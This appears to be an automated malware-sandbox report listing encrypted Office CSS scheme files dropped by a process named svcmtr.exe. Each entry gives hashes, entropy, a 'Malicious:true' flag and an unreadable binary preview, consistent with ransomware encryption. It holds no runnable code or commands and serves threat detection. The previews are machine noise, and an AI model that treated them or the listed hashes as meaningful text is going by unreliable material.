                                                                                                                          SSDEEP:1536:TzuOdnrgJWqrYOReNQIRcR04yAlbVOM1cf7/bkmIhhhutwfvrQLTpm5jJK130tGw:TzNr9MjIRczPctbpIf1nreTpeV3vB
                                                                                                                          MD5:50FF8964465877B163BAB319A53FCB81
                                                                                                                          SHA1:FA65FA124A1BC7F5167D679D5A2EC6A9D790DA94
                                                                                                                          SHA-256:930F8A8C8F927D285F108D35523B54934654B924664AFE675F26009C99961B9D
                                                                                                                          SHA-512:02624F184A697ADA6758515BBDC21D6958696D00A26001E044B08DFB28F091616BC17DD72B8EA446F0AAAA864B22327F7D6025FBF5EFC8C61E01C52A1CF9A494
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...U.KBE.*L.n1Shm.$........7..:......1.0iJJ ./..R.%.+..~...>O...!....7..B._t......H~....Uw.LP@.... .7vx.o74...CW.t....P..N.9G..@q..z.z..F...5.....Iz.,.........D._...W..%....$.@mU!u*n..sDSZy.....K...i..e.........y.}!..i......*.~-...zM...s0.'7.....z...YU..Y....9..b...hNG(.r..Q.,-.z..I..r.a.....u.. |b_6......i.B5J...rZ*k.........3.2.....E.$TK<.L .Q?..S...p.G.S.r.......`o....A.5cj......L.a.n.S.MPy3.K....9.Q...........$..&.m....3=....7._$.f.t.[.P.OF...#......._L..4.....H.....<...0.......R:.....D.Z..)...-?.L.....a...!....ae.B.S..gpD.L....Y.]......}....:-2.6l.S..."..z.m [

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME03.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127438
                                                                                                                          Entropy (8bit):7.998541337307893
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:TzuOdnrgJWqrYOReNQIRcR04yAlbVOM1cf7/bkmIhhhutwfvrQLTpm5jJK130tGw:TzNr9MjIRczPctbpIf1nreTpeV3vB
                                                                                                                          MD5:50FF8964465877B163BAB319A53FCB81
                                                                                                                          SHA1:FA65FA124A1BC7F5167D679D5A2EC6A9D790DA94
                                                                                                                          SHA-256:930F8A8C8F927D285F108D35523B54934654B924664AFE675F26009C99961B9D
                                                                                                                          SHA-512:02624F184A697ADA6758515BBDC21D6958696D00A26001E044B08DFB28F091616BC17DD72B8EA446F0AAAA864B22327F7D6025FBF5EFC8C61E01C52A1CF9A494
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...U.KBE.*L.n1Shm.$........7..:......1.0iJJ ./..R.%.+..~...>O...!....7..B._t......H~....Uw.LP@.... .7vx.o74...CW.t....P..N.9G..@q..z.z..F...5.....Iz.,.........D._...W..%....$.@mU!u*n..sDSZy.....K...i..e.........y.}!..i......*.~-...zM...s0.'7.....z...YU..Y....9..b...hNG(.r..Q.,-.z..I..r.a.....u.. |b_6......i.B5J...rZ*k.........3.2.....E.$TK<.L .Q?..S...p.G.S.r.......`o....A.5cj......L.a.n.S.MPy3.K....9.Q...........$..&.m....3=....7._$.f.t.[.P.OF...#......._L..4.....H.....<...0.......R:.....D.Z..)...-?.L.....a...!....ae.B.S..gpD.L....Y.]......}....:-2.6l.S..."..z.m [

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME04.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128654
                                                                                                                          Entropy (8bit):7.998345705992748
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:lIx0WPcgpmbHrZKkSv6OiNS81xY4Pasahurr3PS6oB8FzD52nHiUZ:6qW6ZTSv6885aBunPS67zlmHZ
                                                                                                                          MD5:369DF8ED1787F571FAF4B997C69BA912
                                                                                                                          SHA1:7D7FB1B91DB0BB973F94C24F548654E279D38A15
                                                                                                                          SHA-256:ACB0AC1211850D881787B1A5799D3B9F72623DE1AFE970C9C4BB923370ECEA3B
                                                                                                                          SHA-512:79899FC646135B7FE299F642F9CD98A22B7C22603EE33BE6D8EE971DDF729B6A2C3F84A6048E7D94C2E0C3AAADCE3B6EDBC4668182225E81F9A457E1D2F1B11C
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......X......B.......c.w.A..,.Tl:.t.+53..a.z......~.......}.....T.uWh.....1P.;.$.......$i...H..y..b2N.@..*K.....zIWy...}(..Z..U.zi`k+jG.X_..C`..fXi.sU.......x...X.q...u..vA....W.9.q.../..'.*.......xE.G.a.....QBB&Ci.h......3.a.w.J........D......`..*....^.2"J-.J..1.......M..%..z.$..^..a..iL..h.J.qN3..I..v+..;t$.N.`..!....c.q.........>...|K.P|..]............>..e..E...KA.l......<.W......e..4..........Z.v...c.dp....5t..9S.B....`.1. d....a<.#.(...D....i....Z....?..Z.HlE(C.....,......q.9t|*~V.u.7'j..g..... U[.~XpI...4T:U..5....R&.iB.i..."B..&.....>.2.r.Q.0Ma...|.io5...39t.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME04.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128654
                                                                                                                          Entropy (8bit):7.998345705992748
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:lIx0WPcgpmbHrZKkSv6OiNS81xY4Pasahurr3PS6oB8FzD52nHiUZ:6qW6ZTSv6885aBunPS67zlmHZ
                                                                                                                          MD5:369DF8ED1787F571FAF4B997C69BA912
                                                                                                                          SHA1:7D7FB1B91DB0BB973F94C24F548654E279D38A15
                                                                                                                          SHA-256:ACB0AC1211850D881787B1A5799D3B9F72623DE1AFE970C9C4BB923370ECEA3B
                                                                                                                          SHA-512:79899FC646135B7FE299F642F9CD98A22B7C22603EE33BE6D8EE971DDF729B6A2C3F84A6048E7D94C2E0C3AAADCE3B6EDBC4668182225E81F9A457E1D2F1B11C
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......X......B.......c.w.A..,.Tl:.t.+53..a.z......~.......}.....T.uWh.....1P.;.$.......$i...H..y..b2N.@..*K.....zIWy...}(..Z..U.zi`k+jG.X_..C`..fXi.sU.......x...X.q...u..vA....W.9.q.../..'.*.......xE.G.a.....QBB&Ci.h......3.a.w.J........D......`..*....^.2"J-.J..1.......M..%..z.$..^..a..iL..h.J.qN3..I..v+..;t$.N.`..!....c.q.........>...|K.P|..]............>..e..E...KA.l......<.W......e..4..........Z.v...c.dp....5t..9S.B....`.1. d....a<.#.(...D....i....Z....?..Z.HlE(C.....,......q.9t|*~V.u.7'j..g..... U[.~XpI...4T:U..5....R&.iB.i..."B..&.....>.2.r.Q.0Ma...|.io5...39t.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME05.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126814
                                                                                                                          Entropy (8bit):7.998625779435899
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:CPrbendZiGT10jBwHghxTl0+sXYWP+dvMnSeaCnGGy:CDqziq2BwHWK+pWP+teaC0
                                                                                                                          MD5:050CEB46AF16463982566CDEBBBFFA6B
                                                                                                                          SHA1:40410EB1D1013A8A64AD44655CB6E2F4BBDABEF9
                                                                                                                          SHA-256:063CB50A4519875E7F742E362939820F3C42D1AEF5F65A20FF3F72275EAE7569
                                                                                                                          SHA-512:EBED1ACC08899CF9ED7E62265CC2951DDBEC733EBE0472F5F313C8CAD82A616308F78A1F169014DB853A30AB78144F8AA3262784A374D96F242CF4264E91839A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....Uh...]kS...M.....t.^......*..~ir`.J...g.b..d......V|n9.2..../....|e.......ey~Aw!0..\....*..~4.%....1&.;..K.j......;.......k..2......YT..;Yc]..2...u..\r.~[i.%~.....BG.9z..H0A...(......b.J..#..)....}{.E........s.p.grH.9.$....e..:..+....ZA..K...^....;.T......t^.....o<A....D.j.=....K....g......ZFX.{P...!....p9..g4..M..1...(.d;.E.........H.;...a..W..#.....[.vE..p....R.I.._EWrkp.Jx..@..&!(.i..:,.x@v...jLK.T>M...;...`......T.....'..........CI...|.....H.....j....3g...Zh.y...L..D.../..X....wI.....q...+PbS.e$6...v......KO....6..(....Vm.... ...L".8)..e.r.7B.e..>o@.a..m..:YHK..x.0.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME05.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126814
                                                                                                                          Entropy (8bit):7.998625779435899
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:CPrbendZiGT10jBwHghxTl0+sXYWP+dvMnSeaCnGGy:CDqziq2BwHWK+pWP+teaC0
                                                                                                                          MD5:050CEB46AF16463982566CDEBBBFFA6B
                                                                                                                          SHA1:40410EB1D1013A8A64AD44655CB6E2F4BBDABEF9
                                                                                                                          SHA-256:063CB50A4519875E7F742E362939820F3C42D1AEF5F65A20FF3F72275EAE7569
                                                                                                                          SHA-512:EBED1ACC08899CF9ED7E62265CC2951DDBEC733EBE0472F5F313C8CAD82A616308F78A1F169014DB853A30AB78144F8AA3262784A374D96F242CF4264E91839A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....Uh...]kS...M.....t.^......*..~ir`.J...g.b..d......V|n9.2..../....|e.......ey~Aw!0..\....*..~4.%....1&.;..K.j......;.......k..2......YT..;Yc]..2...u..\r.~[i.%~.....BG.9z..H0A...(......b.J..#..)....}{.E........s.p.grH.9.$....e..:..+....ZA..K...^....;.T......t^.....o<A....D.j.=....K....g......ZFX.{P...!....p9..g4..M..1...(.d;.E.........H.;...a..W..#.....[.vE..p....R.I.._EWrkp.Jx..@..&!(.i..:,.x@v...jLK.T>M...;...`......T.....'..........CI...|.....H.....j....3g...Zh.y...L..D.../..X....wI.....q...+PbS.e$6...v......KO....6..(....Vm.... ...L".8)..e.r.7B.e..>o@.a..m..:YHK..x.0.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME06.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128126
                                                                                                                          Entropy (8bit):7.998494092822444
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:IssHGYECF3+/YkCqoXuoOAO1kuBUclEZ2nsXcH:IXmYECNcYbXTIkwHEZI
                                                                                                                          MD5:3DC1FE9E6B4E2358090575168812CA95
                                                                                                                          SHA1:446A28BC9C0EF670384F0F9A4E855580E0D7BFE5
                                                                                                                          SHA-256:0C0E338EF8E962B6DA8846129EAB0EA3E1991B5522B462B2EC243E2E6D860D94
                                                                                                                          SHA-512:E5EBD4A3F291BB08B0849D9D400EC8BE6D9F473C1CB06532AC685363078A875F87FCE1F61E1E5412A65E8D9EB0C161BB24966E2B6F8DF6D3BF043601A82E501A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....[.JJ}.?Y............b...P]..1j.Nj.T....O.._Y^.....*.^.G....|`l....EV.&z.b0..Or).b.Z..u*.{....2L.:......<).....m.}r.ij.......AKXO...3zx..{..L....PFl.`Q....Pl...#.v.fq9....Pm..!.._\..M.%$.(.6......L......!........~@....Z...B...rjZl..H....4t.>?q.. 8.....j.&.8.=...Sj.......#~...-.C.\tG...Q.4.L7..D`...`Y.[.%DkU..>.s8`g.;..Zzqa..\..WG..c6d.n.z+...@8...C...h`........F..Q.H..q#6.....[...';w.I...'].*...^.J...n.......i....{a.....4.e.Z0>..:v.w9....*...<.c...;.2.~..:.,.VY....W..aN.u.V.A....]..>.Q..+\8..~..TU....u6...g6...a.'.'.'....N..R.#...?...{.x.xF....BM..?..W.h..../.S....{..&...

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME06.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128126
                                                                                                                          Entropy (8bit):7.998494092822444
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:IssHGYECF3+/YkCqoXuoOAO1kuBUclEZ2nsXcH:IXmYECNcYbXTIkwHEZI
                                                                                                                          MD5:3DC1FE9E6B4E2358090575168812CA95
                                                                                                                          SHA1:446A28BC9C0EF670384F0F9A4E855580E0D7BFE5
                                                                                                                          SHA-256:0C0E338EF8E962B6DA8846129EAB0EA3E1991B5522B462B2EC243E2E6D860D94
                                                                                                                          SHA-512:E5EBD4A3F291BB08B0849D9D400EC8BE6D9F473C1CB06532AC685363078A875F87FCE1F61E1E5412A65E8D9EB0C161BB24966E2B6F8DF6D3BF043601A82E501A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....[.JJ}.?Y............b...P]..1j.Nj.T....O.._Y^.....*.^.G....|`l....EV.&z.b0..Or).b.Z..u*.{....2L.:......<).....m.}r.ij.......AKXO...3zx..{..L....PFl.`Q....Pl...#.v.fq9....Pm..!.._\..M.%$.(.6......L......!........~@....Z...B...rjZl..H....4t.>?q.. 8.....j.&.8.=...Sj.......#~...-.C.\tG...Q.4.L7..D`...`Y.[.%DkU..>.s8`g.;..Zzqa..\..WG..c6d.n.z+...@8...C...h`........F..Q.H..q#6.....[...';w.I...'].*...^.J...n.......i....{a.....4.e.Z0>..:v.w9....*...<.c...;.2.~..:.,.VY....W..aN.u.V.A....]..>.Q..+\8..~..TU....u6...g6...a.'.'.'....N..R.#...?...{.x.xF....BM..?..W.h..../.S....{..&...

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME07.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131326
                                                                                                                          Entropy (8bit):7.998537350730651
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:gDkNHG7wCgnTyLg3woy5WaJCHlLJeeUQ2+x/Mv9LMCmuug:gDk9G75JLg3wo6E9JlUQLk9LMCUg
                                                                                                                          MD5:55569FD0E1DE5BFE4FC3C324BA4E0D85
                                                                                                                          SHA1:E58D3E93B0055293C8152E21596AD8A8721CB9D3
                                                                                                                          SHA-256:56EB47732FFCEEBDE0C86520CC4B7725E9CC158AA55FC0A434C85AD5D856FF2E
                                                                                                                          SHA-512:DF52FC55CAF97D6425667EA01641BCDE3D7FE540BF7DAC4D802601D17D3D3F0ABA281F04BA5C9029D4414A4E17CEE2C8CAD66AFBB56A681E0F7B687B5592430A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...}B..z?..5.m.G.V.........g/...Hl...S......x..../......Z..f.\t...q......Qao..R....)X...W..p.yc.d....."......}...\...cWv...z?(. F.(.MY:l......W.........c...z\r26. ....U]......Ihz....j+...%....c.:.V.,....mnR...G..A..T..{.(.^.'.....K7.A....*=..!....v.H....?...z....[.n!.=].......Q.;.............`.z9.s.p<ho...#....A...`..0..tSR.......i.S....-..;..0f....F.mr...(.GY.......{..X......S)..W..?.@..A..}.S..h....!..B6J...........W.!........bTH..9$.X............/..t...^[...{.8k..X........W.`;.7...^_.*.B...{...=.r}n....l...O..:."....w7io....!........I........cM..Gn..h~X.....:.u..a...

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME07.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131326
                                                                                                                          Entropy (8bit):7.998537350730651
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:gDkNHG7wCgnTyLg3woy5WaJCHlLJeeUQ2+x/Mv9LMCmuug:gDk9G75JLg3wo6E9JlUQLk9LMCUg
                                                                                                                          MD5:55569FD0E1DE5BFE4FC3C324BA4E0D85
                                                                                                                          SHA1:E58D3E93B0055293C8152E21596AD8A8721CB9D3
                                                                                                                          SHA-256:56EB47732FFCEEBDE0C86520CC4B7725E9CC158AA55FC0A434C85AD5D856FF2E
                                                                                                                          SHA-512:DF52FC55CAF97D6425667EA01641BCDE3D7FE540BF7DAC4D802601D17D3D3F0ABA281F04BA5C9029D4414A4E17CEE2C8CAD66AFBB56A681E0F7B687B5592430A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...}B..z?..5.m.G.V.........g/...Hl...S......x..../......Z..f.\t...q......Qao..R....)X...W..p.yc.d....."......}...\...cWv...z?(. F.(.MY:l......W.........c...z\r26. ....U]......Ihz....j+...%....c.:.V.,....mnR...G..A..T..{.(.^.'.....K7.A....*=..!....v.H....?...z....[.n!.=].......Q.;.............`.z9.s.p<ho...#....A...`..0..tSR.......i.S....-..;..0f....F.mr...(.GY.......{..X......S)..W..?.@..A..}.S..h....!..B6J...........W.!........bTH..9$.X............/..t...^[...{.8k..X........W.`;.7...^_.*.B...{...=.r}n....l...O..:."....w7io....!........I........cM..Gn..h~X.....:.u..a...

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME08.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129854
                                                                                                                          Entropy (8bit):7.998308261670788
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:pIpfuTT5VKXbFZoI6PZZRvqD55qlvGn3G3p+ydRZfVB+RgsUj3Oeqpp:WpGTTmXbFZELRS55qtGnWEyNAUTBq/
                                                                                                                          MD5:E2489D440F6A490DE9E87113825692F9
                                                                                                                          SHA1:B0E4F8BB24AE37A8FDF78B907A805F8B567B9C27
                                                                                                                          SHA-256:53D11FF760DE452624AD9B4EFFCC7C3AED1918820F429005C3BF710A71F6D0A2
                                                                                                                          SHA-512:0C8C22137FAB30D8F9EA03BF854AD18BE36973DC1D7043FB5C7999AC38AF4759EE344EE83E16846A307A3AA9967F5B67B22B43C03F73A9B927F148EDEF5F92A7
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..rF...o.;H..!J......?"...&.*.m..6?.....F.....2^...u.^w.6|99..w=c^.....0..S5;.m.0....+h.XR(.....|.G...p....].....x.........2Y6HR.<..._.qx..z.....N.%..PB.."B...X/k..1j...'=.R.*...Y..7.:.....|....[.....f.<.N5....F..g.A.{q.3...l,..IV...\L..3N.r^cf0k...A..A.4].).3.B.+HbvK...s.(9\....x..Y;..9..c.X6.K5G^.u.....%I.!..i...wQ.w&..H..#b..7:9g..[..1\.-..5........"...>....p..MN`@.........EAF.=vD.4..h...3m.i...n.x$....].e.=..a.o..S...5......F4Y....8..u....i..[i.]...........tN.s...[-S..+Y.UQ....\....W.T......F.........Y1..N.c.=.`..^.E..:...s.m....R..7.]A.Vy.kU.I....S7..........{O..(..t..6.X

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME08.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129854
                                                                                                                          Entropy (8bit):7.998308261670788
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:pIpfuTT5VKXbFZoI6PZZRvqD55qlvGn3G3p+ydRZfVB+RgsUj3Oeqpp:WpGTTmXbFZELRS55qtGnWEyNAUTBq/
                                                                                                                          MD5:E2489D440F6A490DE9E87113825692F9
                                                                                                                          SHA1:B0E4F8BB24AE37A8FDF78B907A805F8B567B9C27
                                                                                                                          SHA-256:53D11FF760DE452624AD9B4EFFCC7C3AED1918820F429005C3BF710A71F6D0A2
                                                                                                                          SHA-512:0C8C22137FAB30D8F9EA03BF854AD18BE36973DC1D7043FB5C7999AC38AF4759EE344EE83E16846A307A3AA9967F5B67B22B43C03F73A9B927F148EDEF5F92A7
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..rF...o.;H..!J......?"...&.*.m..6?.....F.....2^...u.^w.6|99..w=c^.....0..S5;.m.0....+h.XR(.....|.G...p....].....x.........2Y6HR.<..._.qx..z.....N.%..PB.."B...X/k..1j...'=.R.*...Y..7.:.....|....[.....f.<.N5....F..g.A.{q.3...l,..IV...\L..3N.r^cf0k...A..A.4].).3.B.+HbvK...s.(9\....x..Y;..9..c.X6.K5G^.u.....%I.!..i...wQ.w&..H..#b..7:9g..[..1\.-..5........"...>....p..MN`@.........EAF.=vD.4..h...3m.i...n.x$....].e.=..a.o..S...5......F4Y....8..u....i..[i.]...........tN.s...[-S..+Y.UQ....\....W.T......F.........Y1..N.c.=.`..^.E..:...s.m....R..7.]A.Vy.kU.I....S7..........{O..(..t..6.X

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME09.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):132590
                                                                                                                          Entropy (8bit):7.998533677693934
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:KD9CrTNq5kpyjVqSXlH39plfc6VLHmok+Ez+COW9:Kx4TsCpyBjtXfLYZIi
                                                                                                                          MD5:84F67D72EBC825226C9FAA825B2550B9
                                                                                                                          SHA1:CF34FF635946CE8EE53A09B7AAD92223BD7A7FCD
                                                                                                                          SHA-256:4186900B152364457C835FB2FE377B445A7C60625216225877006883C45BA2D1
                                                                                                                          SHA-512:E0CD0D206AEC1E629150491897A81DC1C3A295212727A48F5A8851EE4791D15FA0B7DD542A2F86FACEA6D0504436D48BFFC72DDFAEAE330B868267270593AE76
                                                                                                                          Malicious:true
